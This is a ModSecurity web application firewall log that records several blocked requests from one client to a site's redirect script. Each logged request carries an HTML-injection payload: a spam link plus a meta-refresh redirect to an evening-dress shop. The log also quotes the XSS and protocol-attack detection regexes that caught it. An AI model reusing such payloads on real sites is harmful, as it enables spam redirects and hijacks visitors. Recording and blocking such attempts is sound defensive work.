[Mon May 11 19:55:58.247462 2026] [security2:error] [pid 1501831:tid 1501836] [client 27.78.84.116:54931] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYLlNddpkriGUb6ZViUAAAAQM"]
[Mon May 11 19:55:58.248986 2026] [security2:error] [pid 1501831:tid 1501836] [client 27.78.84.116:54931] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYLlNddpkriGUb6ZViUAAAAQM"]
[Mon May 11 19:55:58.249526 2026] [security2:error] [pid 1501831:tid 1501836] [client 27.78.84.116:54931] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYLlNddpkriGUb6ZViUAAAAQM"]
[Mon May 11 19:55:58.249910 2026] [security2:error] [pid 1501831:tid 1501836] [client 27.78.84.116:54931] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYLlNddpkriGUb6ZViUAAAAQM"]
[Mon May 11 19:55:58.250680 2026] [security2:error] [pid 1501831:tid 1501836] [client 27.78.84.116:54931] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYLlNddpkriGUb6ZViUAAAAQM"]
[Mon May 11 19:55:58.251192 2026] [security2:error] [pid 1501831:tid 1501836] [client 27.78.84.116:54931] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYLlNddpkriGUb6ZViUAAAAQM"]
[Mon May 11 19:55:58.252370 2026] [security2:error] [pid 1501831:tid 1501836] [client 27.78.84.116:54931] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYLlNddpkriGUb6ZViUAAAAQM"]
[Mon May 11 19:56:00.400297 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:55355] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMNeaRXe5lR8y0ZN_zwAAAUA"]
[Mon May 11 19:56:00.401023 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:55355] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMNeaRXe5lR8y0ZN_zwAAAUA"]
[Mon May 11 19:56:00.401206 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:55355] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMNeaRXe5lR8y0ZN_zwAAAUA"]
[Mon May 11 19:56:00.401342 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:55355] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMNeaRXe5lR8y0ZN_zwAAAUA"]
[Mon May 11 19:56:00.401542 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:55355] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMNeaRXe5lR8y0ZN_zwAAAUA"]
[Mon May 11 19:56:00.401985 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:55355] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMNeaRXe5lR8y0ZN_zwAAAUA"]
[Mon May 11 19:56:00.402289 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:55355] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMNeaRXe5lR8y0ZN_zwAAAUA"]
[Mon May 11 19:56:02.058815 2026] [security2:error] [pid 1502013:tid 1502037] [client 27.78.84.116:55782] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMpYn-x0CHsbEbP2Y3AAAAIo"]
[Mon May 11 19:56:02.062331 2026] [security2:error] [pid 1502013:tid 1502037] [client 27.78.84.116:55782] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMpYn-x0CHsbEbP2Y3AAAAIo"]
[Mon May 11 19:56:02.062511 2026] [security2:error] [pid 1502013:tid 1502037] [client 27.78.84.116:55782] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMpYn-x0CHsbEbP2Y3AAAAIo"]
[Mon May 11 19:56:02.063206 2026] [security2:error] [pid 1502013:tid 1502037] [client 27.78.84.116:55782] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMpYn-x0CHsbEbP2Y3AAAAIo"]
[Mon May 11 19:56:02.063408 2026] [security2:error] [pid 1502013:tid 1502037] [client 27.78.84.116:55782] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMpYn-x0CHsbEbP2Y3AAAAIo"]
[Mon May 11 19:56:02.063854 2026] [security2:error] [pid 1502013:tid 1502037] [client 27.78.84.116:55782] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMpYn-x0CHsbEbP2Y3AAAAIo"]
[Mon May 11 19:56:02.064129 2026] [security2:error] [pid 1502013:tid 1502037] [client 27.78.84.116:55782] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMpYn-x0CHsbEbP2Y3AAAAIo"]
[Mon May 11 19:56:03.881327 2026] [security2:error] [pid 1516058:tid 1516113] [client 27.78.84.116:56115] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMyMeXtzav-mi9SycggAAANc"]
[Mon May 11 19:56:03.881749 2026] [security2:error] [pid 1516058:tid 1516113] [client 27.78.84.116:56115] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMyMeXtzav-mi9SycggAAANc"]
